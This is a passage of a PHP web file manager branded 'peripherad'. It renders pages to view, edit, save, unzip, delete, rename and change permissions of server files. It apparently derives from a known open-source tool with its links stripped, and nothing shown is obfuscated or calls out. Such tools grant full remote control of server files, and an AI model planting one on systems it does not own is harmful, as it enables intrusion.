                              <input class="form-check-input" type="checkbox" role="switch" id="js-error-report" name="js-error-report" value="true" <?php echo $report_errors ? 'checked' : ''; ?> />
                            </div>
                        </div>
                    </div>

                    <div class="mb-3 row">
                        <label for="js-show-hidden" class="col-sm-3 col-form-label"><?php echo lng('ShowHiddenFiles') ?></label>
                        <div class="col-sm-9">
                            <div class="form-check form-switch">
                              <input class="form-check-input" type="checkbox" role="switch" id="js-show-hidden" name="js-show-hidden" value="true" <?php echo $show_hidden_files ? 'checked' : ''; ?> />
                            </div>
                        </div>
                    </div>

                    <div class="mb-3 row">
                        <label for="js-hide-cols" class="col-sm-3 col-form-label"><?php echo lng('HideColumns') ?></label>
                        <div class="col-sm-9">
                            <div class="form-check form-switch">
                              <input class="form-check-input" type="checkbox" role="switch" id="js-hide-cols" name="js-hide-cols" value="true" <?php echo $hide_Cols ? 'checked' : ''; ?> />
                            </div>
                        </div>
                    </div>

                    <div class="mb-3 row">
                        <label for="js-3-1" class="col-sm-3 col-form-label"><?php echo lng('Theme') ?></label>
                        <div class="col-sm-5">
                            <select class="form-select w-100" id="js-3-0" name="js-theme-3">
                                <option value='light' <?php if($theme == "light"){echo "selected";} ?>><?php echo lng('light') ?></option>
                                <option value='dark' <?php if($theme == "dark"){echo "selected";} ?>><?php echo lng('dark') ?></option>
                            </select>
                        </div>
                    </div>

                    <div class="mb-3 row">
                        <div class="col-sm-10">
                            <button type="submit" class="btn btn-success"> <i class="fa fa-check-circle"></i> <?php echo lng('Save'); ?></button>
                        </div>
                    </div>

                </form>
            </div>
        </div>
    </div>
    <?php
    fm_show_footer();
    exit;
}

if (isset($_GET['help'])) {
    fm_show_header(); // HEADER
    fm_show_nav_path(FM_PATH); // current path
    global $cfg, $lang;
    ?>

    <div class="col-md-8 offset-md-2 pt-3">
        <div class="card mb-2 <?php echo fm_get_theme(); ?>">
            <h6 class="card-header d-flex justify-content-between">
                <span><i class="fa fa-exclamation-circle"></i> <?php echo lng('Help') ?></span>
                <a href="?p=<?php echo FM_PATH ?>" class="text-danger"><i class="fa fa-times-circle-o"></i> <?php echo lng('Cancel')?></a>
            </h6>
            <div class="card-body">
                <div class="row">
                    <div class="col-xs-12 col-sm-6">
                        <p><h3><a href="." target="_blank" class="app-v-title"> peripherad <?php echo VERSION; ?></a></h3></p>
                    </div>
                    <div class="col-xs-12 col-sm-6">
                        <div class="card">
                            <ul class="list-group list-group-flush">
                                <li class="list-group-item"><a href="." target="_blank"><i class="fa fa-question-circle"></i> <?php echo lng('Help Documents') ?> </a> </li>
                                <li class="list-group-item"><a href="." target="_blank"><i class="fa fa-bug"></i> <?php echo lng('Report Issue') ?></a></li>
                                <?php if(!FM_READONLY) { ?>
                                <li class="list-group-item"><a href="javascript:show_new_pwd();"><i class="fa fa-lock"></i> <?php echo lng('Generate new password hash') ?></a></li>
                                <?php } ?>
                            </ul>
                        </div>
                    </div>
                </div>
                <div class="row js-new-pwd hidden mt-2">
                    <div class="col-12">
                        <form class="form-inline" onsubmit="return new_password_hash(this)" method="POST" action="">
                            <input type="hidden" name="type" value="pwdhash" aria-label="hidden" aria-hidden="true">
                            <div class="form-group mb-2">
                                <label for="staticEmail2"><?php echo lng('Generate new password hash') ?></label>
                            </div>
                            <div class="form-group mx-sm-3 mb-2">
                                <label for="inputPassword2" class="sr-only"><?php echo lng('Password') ?></label>
                                <input type="text" class="form-control btn-sm" id="inputPassword2" name="inputPassword2" placeholder="<?php echo lng('Password') ?>" required>
                            </div>
                            <button type="submit" class="btn btn-success btn-sm mb-2"><?php echo lng('Generate') ?></button>
                        </form>
                        <textarea class="form-control" rows="2" readonly id="js-pwd-result"></textarea>
                    </div>
                </div>
            </div>
        </div>
    </div>
    <?php
    fm_show_footer();
    exit;
}

if (isset($_GET['view'])) {
    $file = $_GET['view'];
    $file = fm_clean_path($file, false);
    $file = str_replace('/', '', $file);
    if ($file == '' || !is_file($path . '/' . $file) || !fm_is_exclude_items($file)) {
        fm_set_msg(lng('File not found'), 'error');
        $FM_PATH=FM_PATH; fm_redirect(FM_SELF_URL . '?p=' . urlencode($FM_PATH));
    }

    fm_show_header(); // HEADER
    fm_show_nav_path(FM_PATH); // current path

    $file_url = FM_ROOT_URL . fm_convert_win((FM_PATH != '' ? '/' . FM_PATH : '') . '/' . $file);
    $file_path = $path . '/' . $file;

    $ext = strtolower(pathinfo($file_path, PATHINFO_EXTENSION));
    $mime_type = fm_get_mime_type($file_path);
    $filesize_raw = fm_get_size($file_path);
    $filesize = fm_get_filesize($filesize_raw);

    $is_zip = false;
    $is_gzip = false;
    $is_image = false;
    $is_audio = false;
    $is_video = false;
    $is_text = false;
    $is_onlineViewer = false;

    $view_title = 'File';
    $filenames = false; // for zip
    $content = ''; // for text
    $online_viewer = strtolower(FM_DOC_VIEWER);

    if($online_viewer and $online_viewer !== 'false' and in_array($ext, fm_get_onlineViewer_exts())){
        $is_onlineViewer = true;
    }
    elseif ($ext == 'zip' || $ext == 'tar') {
        $is_zip = true;
        $view_title = 'Archive';
        $filenames = fm_get_zif_info($file_path, $ext);
    } elseif (in_array($ext, fm_get_image_exts())) {
        $is_image = true;
        $view_title = 'Image';
    } elseif (in_array($ext, fm_get_audio_exts())) {
        $is_audio = true;
        $view_title = 'Audio';
    } elseif (in_array($ext, fm_get_video_exts())) {
        $is_video = true;
        $view_title = 'Video';
    } elseif (in_array($ext, fm_get_text_exts()) || substr($mime_type, 0, 4) == 'text' || in_array($mime_type, fm_get_text_mimes())) {
        $is_text = true;
        $content = file_get_contents($file_path);
    }

    ?>
    <div class="row">
        <div class="col-12">
            <p class="break-word"><b><?php echo lng($view_title) ?> "<?php echo fanco(fm_convert_win($file)) ?>"</b></p>
            <p class="break-word">
                <?php $display_path = fm_get_display_path($file_path); ?>
                <strong><?php echo $display_path['label']; ?>:</strong> <?php echo $display_path['path']; ?><br>
                <strong>File size:</strong> <?php echo ($filesize_raw <= 1000) ? "$filesize_raw bytes" : $filesize; ?><br>
                <strong>MIME-type:</strong> <?php echo $mime_type ?><br>
                <?php
                // ZIP info
                if (($is_zip || $is_gzip) and $filenames !== false) {
                    $total_files = 0;
                    $total_comp = 0;
                    $total_uncomp = 0;
                    foreach ($filenames as $fn) {
                        if (!$fn['folder']) {
                            $total_files++;
                        }
                        $total_comp += $fn['compressed_size'];
                        $total_uncomp += $fn['filesize'];
                    }
                    ?>
                    <?php echo lng('Files in archive') ?>: <?php echo $total_files ?><br>
                    <?php echo lng('Total size') ?>: <?php echo fm_get_filesize($total_uncomp) ?><br>
                    <?php echo lng('Size in archive') ?>: <?php echo fm_get_filesize($total_comp) ?><br>
                    <?php echo lng('Compression') ?>: <?php echo round(($total_comp / max($total_uncomp, 1)) * 100) ?>%<br>
                    <?php
                }
                // Image info
                if ($is_image) {
                    $image_size = getimagesize($file_path);
                    echo '<strong>'.lng('Image size').':</strong> ' . (isset($image_size[0]) ? $image_size[0] : '0') . ' x ' . (isset($image_size[1]) ? $image_size[1] : '0') . '<br>';
                }
                // Text info
                if ($is_text) {
                    $is_utf8 = fm_is_utf8($content);
                    if (function_exists('iconv')) {
                        if (!$is_utf8) {
                            $content = iconv(FM_ICONV_INPUT_ENC, 'UTF-8//IGNORE', $content);
                        }
                    }
                    echo '<strong>'.lng('Charset').':</strong> ' . ($is_utf8 ? 'utf-8' : '8 bit') . '<br>';
                }
                ?>
            </p>
            <div class="d-flex align-items-center mb-3">
                <form method="post" class="d-inline ms-2" action="?p=<?php echo urlencode(FM_PATH) ?>&amp;dl=<?php echo urlencode($file) ?>">
                    <input type="hidden" name="token" value="<?php echo $_SESSION['token']; ?>">
                    <button type="submit" class="btn btn-link text-decoration-none fw-bold p-0"><i class="fa fa-cloud-download"></i> <?php echo lng('Download') ?></button> &nbsp;
                </form>
                <b class="ms-2"><a href="<?php echo fanco($file_url) ?>" target="_blank"><i class="fa fa-external-link-square"></i> <?php echo lng('Open') ?></a></b>
                <?php
                // ZIP actions
                if (!FM_READONLY and ($is_zip || $is_gzip) and $filenames !== false) {
                    $zip_name = pathinfo($file_path, PATHINFO_FILENAME);
                    ?>
                    <form method="post" class="d-inline ms-2">
                        <input type="hidden" name="token" value="<?php echo $_SESSION['token']; ?>">
                        <input type="hidden" name="unzip" value="<?php echo urlencode($file); ?>">
                        <button type="submit" class="btn btn-link text-decoration-none fw-bold p-0" style="font-size: 14px;"><i class="fa fa-check-circle"></i> <?php echo lng('UnZip') ?></button>
                    </form>&nbsp;
                    <form method="post" class="d-inline ms-2">
                        <input type="hidden" name="token" value="<?php echo $_SESSION['token']; ?>">
                        <input type="hidden" name="unzip" value="<?php echo urlencode($file); ?>">
                        <input type="hidden" name="tofolder" value="1">
                        <button type="submit" class="btn btn-link text-decoration-none fw-bold p-0" style="font-size: 14px;" title="UnZip to <?php echo fanco($zip_name) ?>"><i class="fa fa-check-circle"></i> <?php echo lng('UnZipToFolder') ?></button>
                    </form>&nbsp;
                    <?php
                }
                if ($is_text and !FM_READONLY) {
                    ?>
                    <b class="ms-2"><a href="?p=<?php echo urlencode(trim(FM_PATH)) ?>&amp;edit=<?php echo urlencode($file) ?>" class="edit-file"><i class="fa fa-pencil-square"></i> <?php echo lng('Edit') ?>
                        </a></b> &nbsp;
                    <b class="ms-2"><a href="?p=<?php echo urlencode(trim(FM_PATH)) ?>&amp;edit=<?php echo urlencode($file) ?>&env=ace"
                            class="edit-file"><i class="fa fa-pencil-square-o"></i> <?php echo lng('AdvancedEditor') ?>
                        </a></b> &nbsp;
                <?php } ?>
                <b class="ms-2"><a href="?p=<?php echo urlencode(FM_PATH) ?>"><i class="fa fa-chevron-circle-left go-back"></i> <?php echo lng('Back') ?></a></b>
            </div>
            <?php
            if($is_onlineViewer) {
                if($online_viewer == 'google') {
                    echo '<iframe src="https://docs.google.com/viewer?embedded=true&hl=en&url=' . fanco($file_url) . '" frameborder="no" style="width:100%;min-height:460px"></iframe>';
                } else if($online_viewer == 'microsoft') {
                    echo '<iframe src="https://view.officeapps.live.com/op/embed.aspx?src=' . fanco($file_url) . '" frameborder="no" style="width:100%;min-height:460px"></iframe>';
                }
            } elseif ($is_zip) {
                // ZIP content
                if ($filenames !== false) {
                    echo '<code class="maxheight">';
                    foreach ($filenames as $fn) {
                        if ($fn['folder']) {
                            echo '<b>' . fanco($fn['name']) . '</b><br>';
                        } else {
                            echo $fn['name'] . ' (' . fm_get_filesize($fn['filesize']) . ')<br>';
                        }
                    }
                    echo '</code>';
                } else {
                    echo '<p>'.lng('Error while fetching archive info').'</p>';
                }
            } elseif ($is_image) {
                // Image content
                if (in_array($ext, array('gif', 'jpg', 'jpeg', 'png', 'bmp', 'ico', 'svg', 'webp', 'avif'))) {
                    echo '<p><input type="checkbox" id="preview-img-zoomCheck"><label for="preview-img-zoomCheck"><img src="' . fanco($file_url) . '" alt="image" class="preview-img"></label></p>';
                }
            } elseif ($is_audio) {
                // Audio content
                echo '<p><audio src="' . fanco($file_url) . '" controls preload="metadata"></audio></p>';
            } elseif ($is_video) {
                // Video content
                echo '<div class="preview-video"><video src="' . fanco($file_url) . '" width="640" height="360" controls preload="metadata"></video></div>';
            } elseif ($is_text) {
                if (FM_USE_HIGHLIGHTJS) {
                    // highlight
                    $hljs_classes = array(
                        'shtml' => 'xml',
                        'htaccess' => 'apache',
                        'phtml' => 'php',
                        'lock' => 'json',
                        'svg' => 'xml',
                    );
                    $hljs_class = isset($hljs_classes[$ext]) ? 'lang-' . $hljs_classes[$ext] : 'lang-' . $ext;
                    if (empty($ext) || in_array(strtolower($file), fm_get_text_names()) || preg_match('#\.min\.(css|js)$#i', $file)) {
                        $hljs_class = 'nohighlight';
                    }
                    $content = '<pre class="with-hljs"><code class="' . $hljs_class . '">' . fanco($content) . '</code></pre>';
                } elseif (in_array($ext, array('php', 'php4', 'php5', 'phtml', 'phps'))) {
                    // php highlight
                    $content = highlight_string($content, true);
                } else {
                    $content = '<pre>' . fanco($content) . '</pre>';
                }
                echo $content;
            }
            ?>
        </div>
    </div>
    <?php
        fm_show_footer();
    exit;
}

// file editor
if (isset($_GET['edit']) and !FM_READONLY) {
    $file = $_GET['edit'];
    $file = fm_clean_path($file, false);
    $file = str_replace('/', '', $file);
    if ($file == '' || !is_file($path . '/' . $file) || !fm_is_exclude_items($file)) {
        fm_set_msg(lng('File not found'), 'error');
        $FM_PATH=FM_PATH; fm_redirect(FM_SELF_URL . '?p=' . urlencode($FM_PATH));
    }
    $editFile = ' : <i><b>'. $file. '</b></i>';
    header('X-XSS-Protection:0');
    fm_show_header(); // HEADER
    fm_show_nav_path(FM_PATH); // current path

    $file_url = FM_ROOT_URL . fm_convert_win((FM_PATH != '' ? '/' . FM_PATH : '') . '/' . $file);
    $file_path = $path . '/' . $file;

    // normal editer
    $isNormalEditor = true;
    if (isset($_GET['env'])) {
        if ($_GET['env'] == "ace") {
            $isNormalEditor = false;
        }
    }

    // Save File
    if (isset($_POST['savedata'])) {
        $writedata = $_POST['savedata'];
        $fd = fopen($file_path, "w");
        @fwrite($fd, $writedata);
        fclose($fd);
        fm_set_msg(lng('File Saved Successfully'));
    }

    $ext = strtolower(pathinfo($file_path, PATHINFO_EXTENSION));
    $mime_type = fm_get_mime_type($file_path);
    $filesize = filesize($file_path);
    $is_text = false;
    $content = ''; // for text

    if (in_array($ext, fm_get_text_exts()) || substr($mime_type, 0, 4) == 'text' || in_array($mime_type, fm_get_text_mimes())) {
        $is_text = true;
        $content = file_get_contents($file_path);
    }

    ?>
    <div class="path">
        <div class="row">
            <div class="col-xs-12 col-sm-5 col-lg-6 pt-1">
                <div class="btn-toolbar" role="toolbar">
                    <?php if (!$isNormalEditor) { ?>
                        <div class="btn-group js-ace-toolbar">
                            <button data-cmd="none" data-option="fullscreen" class="btn btn-sm btn-outline-secondary" id="js-ace-fullscreen" title="<?php echo lng('Fullscreen') ?>"><i class="fa fa-expand" title="<?php echo lng('Fullscreen') ?>"></i></button>
                            <button data-cmd="find" class="btn btn-sm btn-outline-secondary" id="js-ace-search" title="<?php echo lng('Search') ?>"><i class="fa fa-search" title="<?php echo lng('Search') ?>"></i></button>
                            <button data-cmd="undo" class="btn btn-sm btn-outline-secondary" id="js-ace-undo" title="<?php echo lng('Undo') ?>"><i class="fa fa-undo" title="<?php echo lng('Undo') ?>"></i></button>
                            <button data-cmd="redo" class="btn btn-sm btn-outline-secondary" id="js-ace-redo" title="<?php echo lng('Redo') ?>"><i class="fa fa-repeat" title="<?php echo lng('Redo') ?>"></i></button>
                            <button data-cmd="none" data-option="wrap" class="btn btn-sm btn-outline-secondary" id="js-ace-wordWrap" title="<?php echo lng('Word Wrap') ?>"><i class="fa fa-text-width" title="<?php echo lng('Word Wrap') ?>"></i></button>
                            <select id="js-ace-mode" data-type="mode" title="<?php echo lng('Select Document Type') ?>" class="btn-outline-secondary border-start-0 d-none d-md-block"><option>-- <?php echo lng('Select Mode') ?> --</option></select>
                            <select id="js-ace-theme" data-type="theme" title="<?php echo lng('Select Theme') ?>" class="btn-outline-secondary border-start-0 d-none d-lg-block"><option>-- <?php echo lng('Select Theme') ?> --</option></select>
                            <select id="js-ace-fontSize" data-type="fontSize" title="<?php echo lng('Select Font Size') ?>" class="btn-outline-secondary border-start-0 d-none d-lg-block"><option>-- <?php echo lng('Select Font Size') ?> --</option></select>
                        </div>
                    <?php } ?>
                </div>
            </div>
            <div class="edit-file-actions col-xs-12 col-sm-7 col-lg-6 text-end pt-1">
                <a title="<?php echo lng('Back') ?>" class="btn btn-sm btn-outline-primary" href="?p=<?php echo urlencode(trim(FM_PATH)) ?>&amp;view=<?php echo urlencode($file) ?>"><i class="fa fa-reply-all"></i> <?php echo lng('Back') ?></a>
                <a title="<?php echo lng('BackUp') ?>" class="btn btn-sm btn-outline-primary" href="javascript:void(0);" onclick="backup('<?php echo urlencode(trim(FM_PATH)) ?>','<?php echo urlencode($file) ?>')"><i class="fa fa-database"></i> <?php echo lng('BackUp') ?></a>
                <?php if ($is_text) { ?>
                    <?php if ($isNormalEditor) { ?>
                        <a title="Advanced" class="btn btn-sm btn-outline-primary" href="?p=<?php echo urlencode(trim(FM_PATH)) ?>&amp;edit=<?php echo urlencode($file) ?>&amp;env=ace"><i class="fa fa-pencil-square-o"></i> <?php echo lng('AdvancedEditor') ?></a>
                        <button type="button" class="btn btn-sm btn-success" name="Save" data-url="<?php echo fanco($file_url) ?>" onclick="edit_save(this,'nrl')"><i class="fa fa-floppy-o"></i> Save
                        </button>
                    <?php } else { ?>
                        <a title="Plain Editor" class="btn btn-sm btn-outline-primary" href="?p=<?php echo urlencode(trim(FM_PATH)) ?>&amp;edit=<?php echo urlencode($file) ?>"><i class="fa fa-text-height"></i> <?php echo lng('NormalEditor') ?></a>
                        <button type="button" class="btn btn-sm btn-success" name="Save" data-url="<?php echo fanco($file_url) ?>" onclick="edit_save(this,'ace')"><i class="fa fa-floppy-o"></i> <?php echo lng('Save') ?>
                        </button>
                    <?php } ?>
                <?php } ?>
            </div>
        </div>
        <?php
        if ($is_text and $isNormalEditor) {
            echo '<textarea class="mt-2" id="normal-editor" rows="33" cols="120" style="width: 99.5%;">' . htmlspecialchars($content) . '</textarea>';
            echo '<script>document.addEventListener("keydown", function(e) {if ((window.navigator.platform.match("Mac") ? e.metaKey : e.ctrlKey)  and e.keyCode == 83) { e.preventDefault();edit_save(this,"nrl");}}, false);</script>';
        } elseif ($is_text) {
            echo '<div id="editor" contenteditable="true">' . htmlspecialchars($content) . '</div>';
        } else {
            fm_set_msg(lng('FILE EXTENSION HAS NOT SUPPORTED'), 'error');
        }
        ?>
    </div>
    <?php
    fm_show_footer();
    exit;
}

if (isset($_GET['chmod']) and !FM_READONLY and !FM_IS_WIN) {
    $file = $_GET['chmod'];
    $file = fm_clean_path($file);
    $file = str_replace('/', '', $file);
    if ($file == '' || (!is_file($path . '/' . $file) and !is_dir($path . '/' . $file))) {
        fm_set_msg(lng('File not found'), 'error');
        $FM_PATH=FM_PATH; fm_redirect(FM_SELF_URL . '?p=' . urlencode($FM_PATH));
    }

    fm_show_header(); // HEADER
    fm_show_nav_path(FM_PATH); // current path

    $file_url = FM_ROOT_URL . (FM_PATH != '' ? '/' . FM_PATH : '') . '/' . $file;
    $file_path = $path . '/' . $file;

    $mode = fileperms($path . '/' . $file);
    ?>
    <div class="path">
        <div class="card mb-2 <?php echo fm_get_theme(); ?>">
            <h6 class="card-header">
                <?php echo lng('ChangePermissions') ?>
            </h6>
            <div class="card-body">
                <p class="card-text">
                    <?php $display_path = fm_get_display_path($file_path); ?>
                    <?php echo $display_path['label']; ?>: <?php echo $display_path['path']; ?><br>
                </p>
                <form action="" method="post">
                    <input type="hidden" name="p" value="<?php echo fanco(FM_PATH) ?>">
                    <input type="hidden" name="chmod" value="<?php echo fanco($file) ?>">

                    <table class="table compact-table <?php echo fm_get_theme(); ?>">
                        <tr>
                            <td></td>
                            <td><b><?php echo lng('Owner') ?></b></td>
                            <td><b><?php echo lng('Group') ?></b></td>
                            <td><b><?php echo lng('Other') ?></b></td>
                        </tr>
                        <tr>
                            <td style="text-align: right"><b><?php echo lng('Read') ?></b></td>
                            <td><label><input type="checkbox" name="ur" value="1"<?php echo ($mode & 00400) ? ' checked' : '' ?>></label></td>
                            <td><label><input type="checkbox" name="gr" value="1"<?php echo ($mode & 00040) ? ' checked' : '' ?>></label></td>
                            <td><label><input type="checkbox" name="or" value="1"<?php echo ($mode & 00004) ? ' checked' : '' ?>></label></td>
                        </tr>
                        <tr>
                            <td style="text-align: right"><b><?php echo lng('Write') ?></b></td>
                            <td><label><input type="checkbox" name="uw" value="1"<?php echo ($mode & 00200) ? ' checked' : '' ?>></label></td>
                            <td><label><input type="checkbox" name="gw" value="1"<?php echo ($mode & 00020) ? ' checked' : '' ?>></label></td>
                            <td><label><input type="checkbox" name="ow" value="1"<?php echo ($mode & 00002) ? ' checked' : '' ?>></label></td>
                        </tr>
                        <tr>
                            <td style="text-align: right"><b><?php echo lng('Execute') ?></b></td>
                            <td><label><input type="checkbox" name="ux" value="1"<?php echo ($mode & 00100) ? ' checked' : '' ?>></label></td>
                            <td><label><input type="checkbox" name="gx" value="1"<?php echo ($mode & 00010) ? ' checked' : '' ?>></label></td>
                            <td><label><input type="checkbox" name="ox" value="1"<?php echo ($mode & 00001) ? ' checked' : '' ?>></label></td>
                        </tr>
                    </table>

                    <p>
                       <input type="hidden" name="token" value="<?php echo $_SESSION['token']; ?>"> 
                        <b><a href="?p=<?php echo urlencode(FM_PATH) ?>" class="btn btn-outline-primary"><i class="fa fa-times-circle"></i> <?php echo lng('Cancel') ?></a></b>&nbsp;
                        <button type="submit" class="btn btn-success"><i class="fa fa-check-circle"></i> <?php echo lng('Change') ?></button>
                    </p>
                </form>
            </div>
        </div>
    </div>
    <?php
    fm_show_footer();
    exit;
}

fm_show_header(); // HEADER
fm_show_nav_path(FM_PATH); // current path

fm_show_message();

$num_files = count($files);
$num_folders = count($folders);
$all_files_size = 0;
$tableTheme = (FM_THEME == "dark") ? "text-white bg-dark table-dark" : "bg-white";
?>
<form action="" method="post" class="pt-3">
    <input type="hidden" name="p" value="<?php echo fanco(FM_PATH) ?>">
    <input type="hidden" name="group" value="1">
    <input type="hidden" name="token" value="<?php echo $_SESSION['token']; ?>">
    <div class="table-responsive">
        <table class="table table-bordered table-hover table-sm <?php echo $tableTheme; ?>" id="main-table">
            <thead class="thead-white">
            <tr>
                <?php if (!FM_READONLY): ?>
                    <th style="width:3%" class="custom-checkbox-header">
                        <div class="custom-control custom-checkbox">
                            <input type="checkbox" class="custom-control-input" id="js-select-all-items" onclick="checkbox_toggle()">
                            <label class="custom-control-label" for="js-select-all-items"></label>
                        </div>
                    </th><?php endif; ?>
                <th><?php echo lng('Name') ?></th>
                <th><?php echo lng('Size') ?></th>
                <th><?php echo lng('Modified') ?></th>
                <?php if (!FM_IS_WIN and !$hide_Cols): ?>
                    <th><?php echo lng('Perms') ?></th>
                    <th><?php echo lng('Owner') ?></th><?php endif; ?>
                <th><?php echo lng('Actions') ?></th>
            </tr>
            </thead>
            <?php
            if ($parent !== false) {
                ?>
                <tr><?php if (!FM_READONLY): ?>
                    <td class="nosort"></td><?php endif; ?>
                    <td class="border-0" data-sort><a href="?p=<?php echo urlencode($parent) ?>"><i class="fa fa-chevron-circle-left go-back"></i> ..</a></td>
                    <td class="border-0" data-order></td>
                    <td class="border-0" data-order></td>
                    <td class="border-0"></td>
                    <?php if (!FM_IS_WIN and !$hide_Cols) { ?>
                        <td class="border-0"></td>
                        <td class="border-0"></td>
                    <?php } ?>
                </tr>
                <?php
            }
            $uu = 3399;
            foreach ($folders as $f) {
                $is_link = is_link($path . '/' . $f);
                $img = $is_link ? 'icon-link_folder' : 'fa fa-folder-o';
                $modif_raw = filemtime($path . '/' . $f);
                $modif = date(FM_DATETIME_FORMAT, $modif_raw);
                $date_sorting = strtotime(date("F d Y H:i:s.", $modif_raw));
                $filesize_raw = "";
                $filesize = lng('Folder');
                $perms = substr(decoct(fileperms($path . '/' . $f)), -4);
                if (function_exists('posix_getpwuid') and function_exists('posix_getgrgid')) {
                    $owner = posix_getpwuid(fileowner($path . '/' . $f));
                    $group = posix_getgrgid(filegroup($path . '/' . $f));
                    if ($owner === false) {
                        $owner = array('name' => '?');
                    }
                    if ($group === false) {
                        $group = array('name' => '?');
                    }
                } else {
                    $owner = array('name' => '?');
                    $group = array('name' => '?');
                }
                ?>
                <tr>
                    <?php if (!FM_READONLY): ?>
                        <td class="custom-checkbox-td">
                        <div class="custom-control custom-checkbox">
                            <input type="checkbox" class="custom-control-input" id="<?php echo $uu ?>" name="file[]" value="<?php echo fanco($f) ?>">
                            <label class="custom-control-label" for="<?php echo $uu ?>"></label>
                        </div>
                        </td><?php endif; ?>
                    <td data-sort=<?php echo fm_convert_win(fanco($f)) ?>>
                        <div class="filename"><a href="?p=<?php echo urlencode(trim(FM_PATH . '/' . $f, '/')) ?>"><i class="<?php echo $img ?>"></i> <?php echo fm_convert_win(fanco($f)) ?>
                            </a><?php echo($is_link ? ' &rarr; <i>' . readlink($path . '/' . $f) . '</i>' : '') ?></div>
                    </td>
                    <td data-order="a-<?php echo str_pad($filesize_raw, 18, "0", STR_PAD_LEFT);?>">
                        <?php echo $filesize; ?>
                    </td>
                    <td data-order="a-<?php echo $date_sorting;?>"><?php echo $modif ?></td>
                    <?php if (!FM_IS_WIN and !$hide_Cols): ?>
                        <td><?php if (!FM_READONLY): ?><a title="Change Permissions" href="?p=<?php echo urlencode(FM_PATH) ?>&amp;chmod=<?php echo urlencode($f) ?>"><?php echo $perms ?></a><?php else: ?><?php echo $perms ?><?php endif; ?>
                        </td>
                        <td><?php echo $owner['name'] . ':' . $group['name'] ?></td>
                    <?php endif; ?>
                    <td class="inline-actions"><?php if (!FM_READONLY): ?>
                            <a title="<?php echo lng('Delete')?>" href="?p=<?php echo urlencode(FM_PATH) ?>&amp;del=<?php echo urlencode($f) ?>" onclick="confirmDailog(event, '1028','<?php echo lng('Delete').' '.lng('Folder'); ?>','<?php echo urlencode($f) ?>', this.href);"> <i class="fa fa-trash-o" aria-hidden="true"></i></a>
                            <a title="<?php echo lng('Rename')?>" href="#" onclick="rename('<?php echo fanco(addslashes(FM_PATH)) ?>', '<?php echo fanco(addslashes($f)) ?>');return false;"><i class="fa fa-pencil-square-o" aria-hidden="true"></i></a>
                            <a title="<?php echo lng('CopyTo')?>..." href="?p=&amp;copy=<?php echo urlencode(trim(FM_PATH . '/' . $f, '/')) ?>"><i class="fa fa-files-o" aria-hidden="true"></i></a>
                        <?php endif; ?>
                        <a title="<?php echo lng('DirectLink')?>" href="<?php echo fanco(FM_ROOT_URL . (FM_PATH != '' ? '/' . FM_PATH : '') . '/' . $f . '/') ?>" target="_blank"><i class="fa fa-link" aria-hidden="true"></i></a>
                    </td>
                </tr>
                <?php
                flush();
                $uu++;
            }
            $ik = 6070;
            foreach ($files as $f) {
                $is_link = is_link($path . '/' . $f);
                $img = $is_link ? 'fa fa-file-text-o' : fm_get_file_icon_class($path . '/' . $f);
                $modif_raw = filemtime($path . '/' . $f);
                $modif = date(FM_DATETIME_FORMAT, $modif_raw);
                $date_sorting = strtotime(date("F d Y H:i:s.", $modif_raw));
                $filesize_raw = fm_get_size($path . '/' . $f);
                $filesize = fm_get_filesize($filesize_raw);
                $filelink = '?p=' . urlencode(FM_PATH) . '&amp;view=' . urlencode($f);
                $all_files_size += $filesize_raw;
                $perms = substr(decoct(fileperms($path . '/' . $f)), -4);
                if (function_exists('posix_getpwuid') and function_exists('posix_getgrgid')) {
                    $owner = posix_getpwuid(fileowner($path . '/' . $f));
                    $group = posix_getgrgid(filegroup($path . '/' . $f));
                    if ($owner === false) {
                        $owner = array('name' => '?');
                    }
                    if ($group === false) {
                        $group = array('name' => '?');
                    }
                } else {
                    $owner = array('name' => '?');
                    $group = array('name' => '?');
                }
                ?>
                <tr>
                    <?php if (!FM_READONLY): ?>
                        <td class="custom-checkbox-td">
                        <div class="custom-control custom-checkbox">
                            <input type="checkbox" class="custom-control-input" id="<?php echo $ik ?>" name="file[]" value="<?php echo fanco($f) ?>">
                            <label class="custom-control-label" for="<?php echo $ik ?>"></label>
                        </div>
                        </td><?php endif; ?>
                    <td data-sort=<?php echo fanco($f) ?>>
                        <div class="filename">
                        <?php
                           if (in_array(strtolower(pathinfo($f, PATHINFO_EXTENSION)), array('gif', 'jpg', 'jpeg', 'png', 'bmp', 'ico', 'svg', 'webp', 'avif'))): ?>
                                <?php $imagePreview = fanco(FM_ROOT_URL . (FM_PATH != '' ? '/' . FM_PATH : '') . '/' . $f); ?>
                                <a href="<?php echo $filelink ?>" data-preview-image="<?php echo $imagePreview ?>" title="<?php echo fanco($f) ?>">
                           <?php else: ?>
                                <a href="<?php echo $filelink ?>" title="<?php echo $f ?>">
                            <?php endif; ?>
                                    <i class="<?php echo $img ?>"></i> <?php echo fm_convert_win(fanco($f)) ?>
                                </a>
                                <?php echo($is_link ? ' &rarr; <i>' . readlink($path . '/' . $f) . '</i>' : '') ?>
                        </div>
                    </td>
                    <td data-order="b-<?php echo str_pad($filesize_raw, 18, "0", STR_PAD_LEFT); ?>"><span title="<?php printf('%s bytes', $filesize_raw) ?>">
                        <?php echo $filesize; ?>
                        </span></td>
                    <td data-order="b-<?php echo $date_sorting;?>"><?php echo $modif ?></td>
                    <?php if (!FM_IS_WIN and !$hide_Cols): ?>
                        <td><?php if (!FM_READONLY): ?><a title="<?php echo 'Change Permissions' ?>" href="?p=<?php echo urlencode(FM_PATH) ?>&amp;chmod=<?php echo urlencode($f) ?>"><?php echo $perms ?></a><?php else: ?><?php echo $perms ?><?php endif; ?>
                        </td>
                        <td><?php echo fanco($owner['name'] . ':' . $group['name']) ?></td>
                    <?php endif; ?>
                    <td class="inline-actions">
                        <?php if (!FM_READONLY): ?>
                            <a title="<?php echo lng('Delete') ?>" href="?p=<?php echo urlencode(FM_PATH) ?>&amp;del=<?php echo urlencode($f) ?>" onclick="confirmDailog(event, 1209, '<?php echo lng('Delete').' '.lng('File'); ?>','<?php echo urlencode($f); ?>', this.href);"> <i class="fa fa-trash-o"></i></a>
                            <a title="<?php echo lng('Rename') ?>" href="#" onclick="rename('<?php echo fanco(addslashes(FM_PATH)) ?>', '<?php echo fanco(addslashes($f)) ?>');return false;"><i class="fa fa-pencil-square-o"></i></a>
                            <a title="<?php echo lng('CopyTo') ?>..."
                               href="?p=<?php echo urlencode(FM_PATH) ?>&amp;copy=<?php echo urlencode(trim(FM_PATH . '/' . $f, '/')) ?>"><i class="fa fa-files-o"></i></a>
                        <?php endif; ?>
